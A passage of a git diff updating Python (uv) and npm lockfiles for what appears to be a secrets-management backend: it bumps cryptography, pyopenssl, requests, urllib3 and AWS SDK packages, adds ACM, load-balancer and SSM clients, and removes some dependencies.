"https://files.pythonhosted.org/packages/c0/ea/01276740375bac6249d0a971ebdf6b4dc9ead0ee0a34ef3b5a88c1a9b0d4/cryptography-46.0.7-cp314-cp314t-manylinux_2_28_x86_64.whl", hash = "sha256:ffca7aa1d00cf7d6469b988c581598f2259e46215e0140af408966a24cf086ce", size = 4444641, upload-time = "2026-04-08T01:56:52.882Z" }, + { url = "https://files.pythonhosted.org/packages/3d/4c/7d258f169ae71230f25d9f3d06caabcff8c3baf0978e2b7d65e0acac3827/cryptography-46.0.7-cp314-cp314t-manylinux_2_31_armv7l.whl", hash = "sha256:60627cf07e0d9274338521205899337c5d18249db56865f943cbe753aa96f40f", size = 3967749, upload-time = "2026-04-08T01:56:54.597Z" }, + { url = "https://files.pythonhosted.org/packages/b5/2a/2ea0767cad19e71b3530e4cad9605d0b5e338b6a1e72c37c9c1ceb86c333/cryptography-46.0.7-cp314-cp314t-manylinux_2_34_aarch64.whl", hash = "sha256:80406c3065e2c55d7f49a9550fe0c49b3f12e5bfff5dedb727e319e1afb9bf99", size = 4270942, upload-time = "2026-04-08T01:56:56.416Z" }, + { url = "https://files.pythonhosted.org/packages/41/3d/fe14df95a83319af25717677e956567a105bb6ab25641acaa093db79975d/cryptography-46.0.7-cp314-cp314t-manylinux_2_34_ppc64le.whl", hash = "sha256:c5b1ccd1239f48b7151a65bc6dd54bcfcc15e028c8ac126d3fada09db0e07ef1", size = 4871079, upload-time = "2026-04-08T01:56:58.31Z" }, + { url = "https://files.pythonhosted.org/packages/9c/59/4a479e0f36f8f378d397f4eab4c850b4ffb79a2f0d58704b8fa0703ddc11/cryptography-46.0.7-cp314-cp314t-manylinux_2_34_x86_64.whl", hash = "sha256:d5f7520159cd9c2154eb61eb67548ca05c5774d39e9c2c4339fd793fe7d097b2", size = 4443999, upload-time = "2026-04-08T01:57:00.508Z" }, + { url = "https://files.pythonhosted.org/packages/28/17/b59a741645822ec6d04732b43c5d35e4ef58be7bfa84a81e5ae6f05a1d33/cryptography-46.0.7-cp314-cp314t-musllinux_1_2_aarch64.whl", hash = "sha256:fcd8eac50d9138c1d7fc53a653ba60a2bee81a505f9f8850b6b2888555a45d0e", size = 4399191, upload-time = "2026-04-08T01:57:02.654Z" }, + { url = "https://files.pythonhosted.org/packages/59/6a/bb2e166d6d0e0955f1e9ff70f10ec4b2824c9cfcdb4da772c7dd69cc7d80/cryptography-46.0.7-cp314-cp314t-musllinux_1_2_x86_64.whl", hash = "sha256:65814c60f8cc400c63131584e3e1fad01235edba2614b61fbfbfa954082db0ee", size = 4655782, upload-time = "2026-04-08T01:57:04.592Z" }, + { url = "https://files.pythonhosted.org/packages/95/b6/3da51d48415bcb63b00dc17c2eff3a651b7c4fed484308d0f19b30e8cb2c/cryptography-46.0.7-cp314-cp314t-win32.whl", hash = "sha256:fdd1736fed309b4300346f88f74cd120c27c56852c3838cab416e7a166f67298", size = 3002227, upload-time = "2026-04-08T01:57:06.91Z" }, + { url = "https://files.pythonhosted.org/packages/32/a8/9f0e4ed57ec9cebe506e58db11ae472972ecb0c659e4d52bbaee80ca340a/cryptography-46.0.7-cp314-cp314t-win_amd64.whl", hash = "sha256:e06acf3c99be55aa3b516397fe42f5855597f430add9c17fa46bf2e0fb34c9bb", size = 3475332, upload-time = "2026-04-08T01:57:08.807Z" }, + { url = "https://files.pythonhosted.org/packages/a7/7f/cd42fc3614386bc0c12f0cb3c4ae1fc2bbca5c9662dfed031514911d513d/cryptography-46.0.7-cp38-abi3-macosx_10_9_universal2.whl", hash = "sha256:462ad5cb1c148a22b2e3bcc5ad52504dff325d17daf5df8d88c17dda1f75f2a4", size = 7165618, upload-time = "2026-04-08T01:57:10.645Z" }, + { url = "https://files.pythonhosted.org/packages/a5/d0/36a49f0262d2319139d2829f773f1b97ef8aef7f97e6e5bd21455e5a8fb5/cryptography-46.0.7-cp38-abi3-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:84d4cced91f0f159a7ddacad249cc077e63195c36aac40b4150e7a57e84fffe7", size = 4270628, upload-time = "2026-04-08T01:57:12.885Z" }, + { url = "https://files.pythonhosted.org/packages/8a/6c/1a42450f464dda6ffbe578a911f773e54dd48c10f9895a23a7e88b3e7db5/cryptography-46.0.7-cp38-abi3-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:128c5edfe5e5938b86b03941e94fac9ee793a94452ad1365c9fc3f4f62216832", size = 4415405, upload-time = "2026-04-08T01:57:14.923Z" }, + { url = "https://files.pythonhosted.org/packages/9a/92/4ed714dbe93a066dc1f4b4581a464d2d7dbec9046f7c8b7016f5286329e2/cryptography-46.0.7-cp38-abi3-manylinux_2_28_aarch64.whl", hash = "sha256:5e51be372b26ef4ba3de3c167cd3d1022934bc838ae9eaad7e644986d2a3d163", size = 4272715, upload-time = "2026-04-08T01:57:16.638Z" }, + { url = "https://files.pythonhosted.org/packages/b7/e6/a26b84096eddd51494bba19111f8fffe976f6a09f132706f8f1bf03f51f7/cryptography-46.0.7-cp38-abi3-manylinux_2_28_ppc64le.whl", hash = "sha256:cdf1a610ef82abb396451862739e3fc93b071c844399e15b90726ef7470eeaf2", size = 4918400, upload-time = "2026-04-08T01:57:19.021Z" }, + { url = "https://files.pythonhosted.org/packages/c7/08/ffd537b605568a148543ac3c2b239708ae0bd635064bab41359252ef88ed/cryptography-46.0.7-cp38-abi3-manylinux_2_28_x86_64.whl", hash = "sha256:1d25aee46d0c6f1a501adcddb2d2fee4b979381346a78558ed13e50aa8a59067", size = 4450634, upload-time = "2026-04-08T01:57:21.185Z" }, + { url = "https://files.pythonhosted.org/packages/16/01/0cd51dd86ab5b9befe0d031e276510491976c3a80e9f6e31810cce46c4ad/cryptography-46.0.7-cp38-abi3-manylinux_2_31_armv7l.whl", hash = "sha256:cdfbe22376065ffcf8be74dc9a909f032df19bc58a699456a21712d6e5eabfd0", size = 3985233, upload-time = "2026-04-08T01:57:22.862Z" }, + { url = "https://files.pythonhosted.org/packages/92/49/819d6ed3a7d9349c2939f81b500a738cb733ab62fbecdbc1e38e83d45e12/cryptography-46.0.7-cp38-abi3-manylinux_2_34_aarch64.whl", hash = "sha256:abad9dac36cbf55de6eb49badd4016806b3165d396f64925bf2999bcb67837ba", size = 4271955, upload-time = "2026-04-08T01:57:24.814Z" }, + { url = "https://files.pythonhosted.org/packages/80/07/ad9b3c56ebb95ed2473d46df0847357e01583f4c52a85754d1a55e29e4d0/cryptography-46.0.7-cp38-abi3-manylinux_2_34_ppc64le.whl", hash = "sha256:935ce7e3cfdb53e3536119a542b839bb94ec1ad081013e9ab9b7cfd478b05006", size = 4879888, upload-time = "2026-04-08T01:57:26.88Z" }, + { url = "https://files.pythonhosted.org/packages/b8/c7/201d3d58f30c4c2bdbe9b03844c291feb77c20511cc3586daf7edc12a47b/cryptography-46.0.7-cp38-abi3-manylinux_2_34_x86_64.whl", hash = "sha256:35719dc79d4730d30f1c2b6474bd6acda36ae2dfae1e3c16f2051f215df33ce0", size = 4449961, upload-time = "2026-04-08T01:57:29.068Z" }, + { url = "https://files.pythonhosted.org/packages/a5/ef/649750cbf96f3033c3c976e112265c33906f8e462291a33d77f90356548c/cryptography-46.0.7-cp38-abi3-musllinux_1_2_aarch64.whl", hash = "sha256:7bbc6ccf49d05ac8f7d7b5e2e2c33830d4fe2061def88210a126d130d7f71a85", size = 4401696, upload-time = "2026-04-08T01:57:31.029Z" }, + { url = "https://files.pythonhosted.org/packages/41/52/a8908dcb1a389a459a29008c29966c1d552588d4ae6d43f3a1a4512e0ebe/cryptography-46.0.7-cp38-abi3-musllinux_1_2_x86_64.whl", hash = "sha256:a1529d614f44b863a7b480c6d000fe93b59acee9c82ffa027cfadc77521a9f5e", size = 4664256, upload-time = "2026-04-08T01:57:33.144Z" }, + { url = "https://files.pythonhosted.org/packages/4b/fa/f0ab06238e899cc3fb332623f337a7364f36f4bb3f2534c2bb95a35b132c/cryptography-46.0.7-cp38-abi3-win32.whl", hash = "sha256:f247c8c1a1fb45e12586afbb436ef21ff1e80670b2861a90353d9b025583d246", size = 3013001, upload-time = "2026-04-08T01:57:34.933Z" }, + { url = "https://files.pythonhosted.org/packages/d2/f1/00ce3bde3ca542d1acd8f8cfa38e446840945aa6363f9b74746394b14127/cryptography-46.0.7-cp38-abi3-win_amd64.whl", hash = "sha256:506c4ff91eff4f82bdac7633318a526b1d1309fc07ca76a3ad182cb5b686d6d3", size = 3472985, upload-time = "2026-04-08T01:57:36.714Z" }, ] [[package]] @@ -470,15 +467,15 @@ wheels = [ [[package]] name = "pyopenssl" -version = "25.3.0" +version = "26.0.0" source = { registry = "https://pypi.org/simple" } dependencies = [ { name = "cryptography" }, { name = "typing-extensions", marker = "python_full_version < '3.13'" }, ] -sdist = { url = "https://files.pythonhosted.org/packages/80/be/97b83a464498a79103036bc74d1038df4a7ef0e402cfaf4d5e113fb14759/pyopenssl-25.3.0.tar.gz", hash = "sha256:c981cb0a3fd84e8602d7afc209522773b94c1c2446a3c710a75b06fe1beae329", size = 184073, upload-time = "2025-09-17T00:32:21.037Z" } +sdist = { url = "https://files.pythonhosted.org/packages/8e/11/a62e1d33b373da2b2c2cd9eb508147871c80f12b1cacde3c5d314922afdd/pyopenssl-26.0.0.tar.gz", hash = "sha256:f293934e52936f2e3413b89c6ce36df66a0b34ae1ea3a053b8c5020ff2f513fc", size = 185534, upload-time = "2026-03-15T14:28:26.353Z" } wheels = [ - { url = "https://files.pythonhosted.org/packages/d1/81/ef2b1dfd1862567d573a4fdbc9f969067621764fbb74338496840a1d2977/pyopenssl-25.3.0-py3-none-any.whl", hash = "sha256:1fda6fc034d5e3d179d39e59c1895c9faeaf40a79de5fc4cbbfbe0d36f4a77b6", size = 57268, upload-time = "2025-09-17T00:32:19.474Z" }, + { url = "https://files.pythonhosted.org/packages/fb/7d/d4f7d908fa8415571771b30669251d57c3cf313b36a856e6d7548ae01619/pyopenssl-26.0.0-py3-none-any.whl", hash = "sha256:df94d28498848b98cc1c0ffb8ef1e71e40210d3b0a8064c9d29571ed2904bf81", size = 57969, upload-time = "2026-03-15T14:28:24.864Z" }, ] [[package]] @@ -501,7 +498,7 @@ wheels = [ [[package]] name = "requests" -version = "2.32.5" +version = "2.33.1" source = { registry = "https://pypi.org/simple" } dependencies = [ { name = "certifi" }, @@ -509,9 +506,9 @@ dependencies = [ { name = "idna" }, { name = "urllib3" }, ] -sdist = { url = "https://files.pythonhosted.org/packages/c9/74/b3ff8e6c8446842c3f5c837e9c3dfcfe2018ea6ecef224c710c85ef728f4/requests-2.32.5.tar.gz", hash = "sha256:dbba0bac56e100853db0ea71b82b4dfd5fe2bf6d3754a8893c3af500cec7d7cf", size = 134517, upload-time = "2025-08-18T20:46:02.573Z" } +sdist = { url = "https://files.pythonhosted.org/packages/5f/a4/98b9c7c6428a668bf7e42ebb7c79d576a1c3c1e3ae2d47e674b468388871/requests-2.33.1.tar.gz", hash = "sha256:18817f8c57c6263968bc123d237e3b8b08ac046f5456bd1e307ee8f4250d3517", size = 134120, upload-time = "2026-03-30T16:09:15.531Z" } wheels = [ - { url = "https://files.pythonhosted.org/packages/1e/db/4254e3eabe8020b458f1a747140d32277ec7a271daf1d235b70dc0b4e6e3/requests-2.32.5-py3-none-any.whl", hash = "sha256:2462f94637a34fd532264295e186976db0f5d453d1cdd31473c85a6a161affb6", size = 64738, upload-time = "2025-08-18T20:46:00.542Z" }, + { url = "https://files.pythonhosted.org/packages/d7/8e/7540e8a2036f79a125c1d2ebadf69ed7901608859186c856fa0388ef4197/requests-2.33.1-py3-none-any.whl", hash = "sha256:4e6d1ef462f3626a1f0a0a9c42dd93c63bad33f9f1c1937509b8c5c8718ab56a", size = 64947, upload-time = "2026-03-30T16:09:13.83Z" }, ] [[package]] @@ -552,9 +549,9 @@ wheels = [ [[package]] name = "urllib3" -version = "2.5.0" +version = "2.6.3" source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/15/22/9ee70a2574a4f4599c47dd506532914ce044817c7752a79b6a51286319bc/urllib3-2.5.0.tar.gz", hash = "sha256:3fc47733c7e419d4bc3f6b3dc2b4f890bb743906a30d56ba4a5bfa4bbff92760", size = 393185, upload-time = "2025-06-18T14:07:41.644Z" } +sdist = { url = "https://files.pythonhosted.org/packages/c7/24/5f1b3bdffd70275f6661c76461e25f024d5a38a46f04aaca912426a2b1d3/urllib3-2.6.3.tar.gz", hash = "sha256:1b62b6884944a57dbe321509ab94fd4d3b307075e0c2eae991ac71ee15ad38ed", size = 435556, upload-time = "2026-01-07T16:24:43.925Z" } wheels = [ - { url = "https://files.pythonhosted.org/packages/a7/c2/fe1e52489ae3122415c51f387e221dd0773709bad6c6cdaa599e8a2c5185/urllib3-2.5.0-py3-none-any.whl", hash = "sha256:e6b01673c0fa6a13e374b50871808eb3bf7046c4b125b216f6bf1cc604cff0dc", size = 129795, upload-time = "2025-06-18T14:07:40.39Z" }, + { url = "https://files.pythonhosted.org/packages/39/08/aaaad47bc4e9dc8c725e68f9d04865dbcb2052843ff09c97b08904852d84/urllib3-2.6.3-py3-none-any.whl", hash = "sha256:bf272323e553dfb2e87d9bfd225ca7b0f467b919d7bbd355436d3fd37cb0acd4", size = 131584, upload-time = "2026-01-07T16:24:42.685Z" }, ] diff --git a/backend/package-lock.json b/backend/package-lock.json index 56ed467259c..6c0db7c3751 100644 --- a/backend/package-lock.json +++ b/backend/package-lock.json @@ -10,12 +10,15 @@ "license": "ISC", "dependencies": { "@ai-sdk/anthropic": "^3.0.68", + "@aws-sdk/client-acm": "^3.1030.0", "@aws-sdk/client-acm-pca": "^3.992.0", + "@aws-sdk/client-elastic-load-balancing-v2": "^3.1015.0", "@aws-sdk/client-elasticache": "^3.637.0", "@aws-sdk/client-iam": "^3.525.0", "@aws-sdk/client-kms": "^3.609.0", "@aws-sdk/client-route-53": "^3.810.0", "@aws-sdk/client-secrets-manager": "^3.504.0", + "@aws-sdk/client-ssm": "^3.1015.0", "@aws-sdk/client-sts": "^3.600.0", "@casl/ability": "^6.5.0", "@clickhouse/client": "^1.17.0", @@ -36,7 +39,7 @@ "@fastify/swagger-ui": "^3.1.0", "@fastify/websocket": "^10.0.1", "@gitbeaker/rest": "^42.5.0", - "@google-cloud/kms": "^4.5.0", + "@google-cloud/kms": "^5.4.0", "@infisical/ldapjs": "3.0.11", "@infisical/pg-view-generator": "^1.1.0", "@infisical/quic": "^1.0.8", @@ -46,7 +49,6 @@ "@octokit/core": "^5.2.1", "@octokit/plugin-paginate-graphql": "^4.0.1", "@octokit/plugin-retry": "^5.0.5", - "@octokit/request": "8.4.1", "@octokit/rest": "^20.0.2", "@octokit/webhooks-types": "^7.3.1", "@octopusdeploy/api-client": "^3.4.1", @@ -58,12 +60,9 @@ "@opentelemetry/resources": "^1.28.0", "@opentelemetry/sdk-metrics": "^1.28.0", "@opentelemetry/semantic-conventions": "^1.27.0", - "@peculiar/asn1-cms": "^2.6.1", - "@peculiar/asn1-pkcs9": "^2.6.1", "@peculiar/asn1-schema": "^2.3.8", "@peculiar/x509": "^1.12.1", "@react-email/components": "^1.0.1", - "@serdnam/pino-cloudwatch-transport": "^1.0.4", "@simplewebauthn/server": "^13.2.2", "@sindresorhus/slugify": "1.1.0", "@slack/oauth": "^3.0.2", @@ -72,11 +71,9 @@ "@ucast/mongo2js": "^1.3.4", "acme-client": "^5.4.0", "ai": "^6.0.154", - "ajv": "^8.12.0", "argon2": "^0.31.2", "asn1js": "^3.0.6", - "aws-sdk": "^2.1553.0", - "axios": "^1.12.0", + "axios": "^1.15.0", "axios-ntlm": "^1.4.4", "axios-retry": "^4.0.0", "bcrypt": "^5.1.1", @@ -96,9 +93,7 @@ "hdb": "^0.19.10", "ioredis": "^5.3.2", "isomorphic-dompurify": "^2.22.0", - "jmespath": "^0.16.0", "jose": "^6.1.0", - "js-yaml": "^4.1.0", "jsonwebtoken": "^9.0.2", "jsrp": "^0.2.4", "jwks-rsa": "^3.1.0", @@ -114,7 +109,7 @@ "nanoid": "^3.3.8", "netmask": "^2.0.2", "node-forge": "^1.3.2", - "nodemailer": "^7.0.12", + "nodemailer": "^8.0.5", "oci-common": "^2.108.0", "oci-identity": "^2.108.0", "oci-keymanagement": "^2.108.0", @@ -167,8 +162,6 @@ "@smithy/types": "^4.3.1", "@types/bcrypt": "^5.0.2", "@types/dns-packet": "^5.6.5", - "@types/jmespath": "^0.15.2", - "@types/js-yaml": "^4.0.9", "@types/jsonwebtoken": "^9.0.5", "@types/jsrp": "^0.2.6", "@types/libsodium-wrappers": "^0.7.13", @@ -201,11 +194,9 @@ "eslint-plugin-simple-import-sort": "^10.0.0", "nock": "^14.0.10", "nodemon": "^3.0.2", - "ora": "^7.0.1", "pino-pretty": "^10.2.3", "prompt-sync": "^4.2.0", "react-email": "^5.0.6", - "rimraf": "^5.0.5", "ts-node": "^10.9.2", "tsc-alias": "^1.8.8", "tsconfig-paths": "^4.2.0", @@ -521,6 +512,57 @@ "node": ">=14.0.0" } }, + "node_modules/@aws-sdk/client-acm": { + "version": "3.1031.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/client-acm/-/client-acm-3.1031.0.tgz", + "integrity": "sha512-QJxeg+GsXlAVdgiNgUb0pSUhoLP4x8S4VPFLGmimJx212/kfbNwBH+T7r5os09KR8U5gBAe2U8VLJhyF8dUl7w==", + "license": "Apache-2.0", + "dependencies": { + "@aws-crypto/sha256-browser": "5.2.0", + "@aws-crypto/sha256-js": "5.2.0", + "@aws-sdk/core": "^3.974.0", + "@aws-sdk/credential-provider-node": "^3.972.31", + "@aws-sdk/middleware-host-header": "^3.972.10", + "@aws-sdk/middleware-logger": "^3.972.10", + "@aws-sdk/middleware-recursion-detection": "^3.972.11", + "@aws-sdk/middleware-user-agent": "^3.972.30", + "@aws-sdk/region-config-resolver": "^3.972.12", + "@aws-sdk/types": "^3.973.8", + "@aws-sdk/util-endpoints": "^3.996.7", + "@aws-sdk/util-user-agent-browser": "^3.972.10", + "@aws-sdk/util-user-agent-node": "^3.973.16", + "@smithy/config-resolver": "^4.4.16", + "@smithy/core": "^3.23.15", + "@smithy/fetch-http-handler": "^5.3.17", + "@smithy/hash-node": "^4.2.14", + "@smithy/invalid-dependency": "^4.2.14", + "@smithy/middleware-content-length": "^4.2.14", + "@smithy/middleware-endpoint": "^4.4.30", + "@smithy/middleware-retry": "^4.5.3", + "@smithy/middleware-serde": "^4.2.18", + "@smithy/middleware-stack": "^4.2.14", + "@smithy/node-config-provider": "^4.3.14", + "@smithy/node-http-handler": "^4.5.3", + "@smithy/protocol-http": "^5.3.14", + "@smithy/smithy-client": "^4.12.11", + "@smithy/types": "^4.14.1", + "@smithy/url-parser": "^4.2.14", + "@smithy/util-base64": "^4.3.2", + "@smithy/util-body-length-browser": "^4.2.2", + "@smithy/util-body-length-node": "^4.2.3", + "@smithy/util-defaults-mode-browser": "^4.3.47", + "@smithy/util-defaults-mode-node": "^4.2.52", + "@smithy/util-endpoints": "^3.4.1", + "@smithy/util-middleware": "^4.2.14", + "@smithy/util-retry": "^4.3.2", + "@smithy/util-utf8": "^4.2.2", + "@smithy/util-waiter": "^4.2.16", + "tslib": "^2.6.2" + }, + "engines": { + "node": ">=20.0.0" + } + }, "node_modules/@aws-sdk/client-acm-pca": { "version": "3.992.0", "resolved": "https://registry.npmjs.org/@aws-sdk/client-acm-pca/-/client-acm-pca-3.992.0.tgz", @@ -588,53 +630,51 @@ "node": ">=20.0.0" } }, - "node_modules/@aws-sdk/client-cloudwatch-logs": { - "version": "3.1020.0", - "resolved": "https://registry.npmjs.org/@aws-sdk/client-cloudwatch-logs/-/client-cloudwatch-logs-3.1020.0.tgz", - "integrity": "sha512-ezS+wZbSJYbncXtfO0BOyNdqeRnKPSRPZNq111aydoZoW0Q/FnTiRbISZoMLqOCnwJVOX3EZMGNGpUvVyJ+CGQ==", + "node_modules/@aws-sdk/client-elastic-load-balancing-v2": { + "version": "3.1037.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/client-elastic-load-balancing-v2/-/client-elastic-load-balancing-v2-3.1037.0.tgz", + "integrity": "sha512-GwlGNTz8IrsJuAx8e50jzzMj3JPAHaMFupXsJoSjvb44p7UDS+Qr4NgSV7AkJ6KH9KMiWf3zlWFpAN9VoHbS9w==", "license": "Apache-2.0", "dependencies": { "@aws-crypto/sha256-browser": "5.2.0", "@aws-crypto/sha256-js": "5.2.0", - "@aws-sdk/core": "^3.973.26", - "@aws-sdk/credential-provider-node": "^3.972.28", - "@aws-sdk/middleware-host-header": "^3.972.8", - "@aws-sdk/middleware-logger": "^3.972.8", - "@aws-sdk/middleware-recursion-detection": "^3.972.9", - "@aws-sdk/middleware-user-agent": "^3.972.27", - "@aws-sdk/region-config-resolver": "^3.972.10", - "@aws-sdk/types": "^3.973.6", - "@aws-sdk/util-endpoints": "^3.996.5", - "@aws-sdk/util-user-agent-browser": "^3.972.8", - "@aws-sdk/util-user-agent-node": "^3.973.13", - "@smithy/config-resolver": "^4.4.13", - "@smithy/core": "^3.23.13", - "@smithy/eventstream-serde-browser": "^4.2.12", - "@smithy/eventstream-serde-config-resolver": "^4.3.12", - "@smithy/eventstream-serde-node": "^4.2.12", - "@smithy/fetch-http-handler": "^5.3.15", - "@smithy/hash-node": "^4.2.12", - "@smithy/invalid-dependency": "^4.2.12", - "@smithy/middleware-content-length": "^4.2.12", - "@smithy/middleware-endpoint": "^4.4.28", - "@smithy/middleware-retry": "^4.4.45", - "@smithy/middleware-serde": "^4.2.16", - "@smithy/middleware-stack": "^4.2.12", - "@smithy/node-config-provider": "^4.3.12", - "@smithy/node-http-handler": "^4.5.1", - "@smithy/protocol-http": "^5.3.12", - "@smithy/smithy-client": "^4.12.8", - "@smithy/types": "^4.13.1", - "@smithy/url-parser": "^4.2.12", + "@aws-sdk/core": "^3.974.5", + "@aws-sdk/credential-provider-node": "^3.972.36", + "@aws-sdk/middleware-host-header": "^3.972.10", + "@aws-sdk/middleware-logger": "^3.972.10", + "@aws-sdk/middleware-recursion-detection": "^3.972.11", + "@aws-sdk/middleware-user-agent": "^3.972.35", + "@aws-sdk/region-config-resolver": "^3.972.13", + "@aws-sdk/types": "^3.973.8", + "@aws-sdk/util-endpoints": "^3.996.8", + "@aws-sdk/util-user-agent-browser": "^3.972.10", + "@aws-sdk/util-user-agent-node": "^3.973.21", + "@smithy/config-resolver": "^4.4.17", + "@smithy/core": "^3.23.17", + "@smithy/fetch-http-handler": "^5.3.17", + "@smithy/hash-node": "^4.2.14", + "@smithy/invalid-dependency": "^4.2.14", + "@smithy/middleware-content-length": "^4.2.14", + "@smithy/middleware-endpoint": "^4.4.32", + "@smithy/middleware-retry": "^4.5.5", + "@smithy/middleware-serde": "^4.2.20", + "@smithy/middleware-stack": "^4.2.14", + "@smithy/node-config-provider": "^4.3.14", + "@smithy/node-http-handler": "^4.6.1", + "@smithy/protocol-http": "^5.3.14", + "@smithy/smithy-client": "^4.12.13", + "@smithy/types": "^4.14.1", + "@smithy/url-parser": "^4.2.14", "@smithy/util-base64": "^4.3.2", "@smithy/util-body-length-browser": "^4.2.2", "@smithy/util-body-length-node": "^4.2.3", - "@smithy/util-defaults-mode-browser": "^4.3.44", - "@smithy/util-defaults-mode-node": "^4.2.48", - "@smithy/util-endpoints": "^3.3.3", - "@smithy/util-middleware": "^4.2.12", - "@smithy/util-retry": "^4.2.12", + "@smithy/util-defaults-mode-browser": "^4.3.49", + "@smithy/util-defaults-mode-node": "^4.2.54", + "@smithy/util-endpoints": "^3.4.2", + "@smithy/util-middleware": "^4.2.14", + "@smithy/util-retry": "^4.3.4", "@smithy/util-utf8": "^4.2.2", + "@smithy/util-waiter": "^4.2.16", "tslib": "^2.6.2" }, "engines": { @@ -1013,6 +1053,57 @@ "node": ">=20.0.0" } }, + "node_modules/@aws-sdk/client-ssm": { + "version": "3.1037.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/client-ssm/-/client-ssm-3.1037.0.tgz", + "integrity": "sha512-bpOon1QQ+FN1yH7NbjjHnyQ7y5xPvS/3vS2nL3+e2+Iu9sA+WJwgwquk6N+U1EtnAuGPAl9eNzk0GnEHaIwAOQ==", + "license": "Apache-2.0", + "dependencies": { + "@aws-crypto/sha256-browser": "5.2.0", + "@aws-crypto/sha256-js": "5.2.0", + "@aws-sdk/core": "^3.974.5", + "@aws-sdk/credential-provider-node": "^3.972.36", + "@aws-sdk/middleware-host-header": "^3.972.10", + "@aws-sdk/middleware-logger": "^3.972.10", + "@aws-sdk/middleware-recursion-detection": "^3.972.11", + "@aws-sdk/middleware-user-agent": "^3.972.35", + "@aws-sdk/region-config-resolver": "^3.972.13", + "@aws-sdk/types": "^3.973.8", + "@aws-sdk/util-endpoints": "^3.996.8", + "@aws-sdk/util-user-agent-browser": "^3.972.10", + "@aws-sdk/util-user-agent-node": "^3.973.21", + "@smithy/config-resolver": "^4.4.17", + "@smithy/core": "^3.23.17", + "@smithy/fetch-http-handler": "^5.3.17", + "@smithy/hash-node": "^4.2.14", + "@smithy/invalid-dependency": "^4.2.14", + "@smithy/middleware-content-length": "^4.2.14", + "@smithy/middleware-endpoint": "^4.4.32", + "@smithy/middleware-retry": "^4.5.5", + "@smithy/middleware-serde": "^4.2.20", + "@smithy/middleware-stack": "^4.2.14", + "@smithy/node-config-provider": "^4.3.14", + "@smithy/node-http-handler": "^4.6.1", + "@smithy/protocol-http": "^5.3.14", + "@smithy/smithy-client": "^4.12.13", + "@smithy/types": "^4.14.1", + "@smithy/url-parser": "^4.2.14", + "@smithy/util-base64": "^4.3.2", + "@smithy/util-body-length-browser": "^4.2.2", + "@smithy/util-body-length-node": "^4.2.3", + "@smithy/util-defaults-mode-browser": "^4.3.49", + "@smithy/util-defaults-mode-node": "^4.2.54", + "@smithy/util-endpoints": "^3.4.2", + "@smithy/util-middleware": "^4.2.14", + "@smithy/util-retry": "^4.3.4", + "@smithy/util-utf8": "^4.2.2", + "@smithy/util-waiter": "^4.2.16", + "tslib": "^2.6.2" + }, + "engines": { + "node": ">=20.0.0" + } + }, "node_modules/@aws-sdk/client-sts": { "version": "3.1020.0", "resolved": "https://registry.npmjs.org/@aws-sdk/client-sts/-/client-sts-3.1020.0.tgz", @@ -1064,22 +1155,23 @@ } }, "node_modules/@aws-sdk/core": { - "version": "3.973.26", - "resolved": "https://registry.npmjs.org/@aws-sdk/core/-/core-3.973.26.tgz", - "integrity": "sha512-A/E6n2W42ruU+sfWk+mMUOyVXbsSgGrY3MJ9/0Az5qUdG67y8I6HYzzoAa+e/lzxxl1uCYmEL6BTMi9ZiZnplQ==", + "version": "3.974.5", + "resolved": "https://registry.npmjs.org/@aws-sdk/core/-/core-3.974.5.tgz", + "integrity": "sha512-lMPlYlYfQdNZhlkJgnkmESwrY+hNh3PljmZ+37oAqLNdJ6rnILAwFSyc6B3bJeDOtMORNnMQIej0aTRuOlDyhQ==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/types": "^3.973.6", - "@aws-sdk/xml-builder": "^3.972.16", - "@smithy/core": "^3.23.13", - "@smithy/node-config-provider": "^4.3.12", - "@smithy/property-provider": "^4.2.12", - "@smithy/protocol-http": "^5.3.12", - "@smithy/signature-v4": "^5.3.12", - "@smithy/smithy-client": "^4.12.8", - "@smithy/types": "^4.13.1", + "@aws-sdk/types": "^3.973.8", + "@aws-sdk/xml-builder": "^3.972.19", + "@smithy/core": "^3.23.17", + "@smithy/node-config-provider": "^4.3.14", + "@smithy/property-provider": "^4.2.14", + "@smithy/protocol-http": "^5.3.14", + "@smithy/signature-v4": "^5.3.14", + "@smithy/smithy-client": "^4.12.13", + "@smithy/types": "^4.14.1", "@smithy/util-base64": "^4.3.2", - "@smithy/util-middleware": "^4.2.12", + "@smithy/util-middleware": "^4.2.14", + "@smithy/util-retry": "^4.3.4", "@smithy/util-utf8": "^4.2.2", "tslib": "^2.6.2" }, @@ -1101,15 +1193,15 @@ } }, "node_modules/@aws-sdk/credential-provider-env": { - "version": "3.972.24", - "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-env/-/credential-provider-env-3.972.24.tgz", - "integrity": "sha512-FWg8uFmT6vQM7VuzELzwVo5bzExGaKHdubn0StjgrcU5FvuLExUe+k06kn/40uKv59rYzhez8eFNM4yYE/Yb/w==", + "version": "3.972.31", + "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-env/-/credential-provider-env-3.972.31.tgz", + "integrity": "sha512-X/yGB73LmDW/6MdDJGCDzZBUXnM3ys4vs9l+5ZTJmiEswDdP1OjeoAFlFjVGS9o4KB2wZWQ9KOfdVNSSK6Ep3w==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/core": "^3.973.26", - "@aws-sdk/types": "^3.973.6", - "@smithy/property-provider": "^4.2.12", - "@smithy/types": "^4.13.1", + "@aws-sdk/core": "^3.974.5", + "@aws-sdk/types": "^3.973.8", + "@smithy/property-provider": "^4.2.14", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -1117,20 +1209,20 @@ } }, "node_modules/@aws-sdk/credential-provider-http": { - "version": "3.972.26", - "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-http/-/credential-provider-http-3.972.26.tgz", - "integrity": "sha512-CY4ppZ+qHYqcXqBVi//sdHST1QK3KzOEiLtpLsc9W2k2vfZPKExGaQIsOwcyvjpjUEolotitmd3mUNY56IwDEA==", + "version": "3.972.33", + "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-http/-/credential-provider-http-3.972.33.tgz", + "integrity": 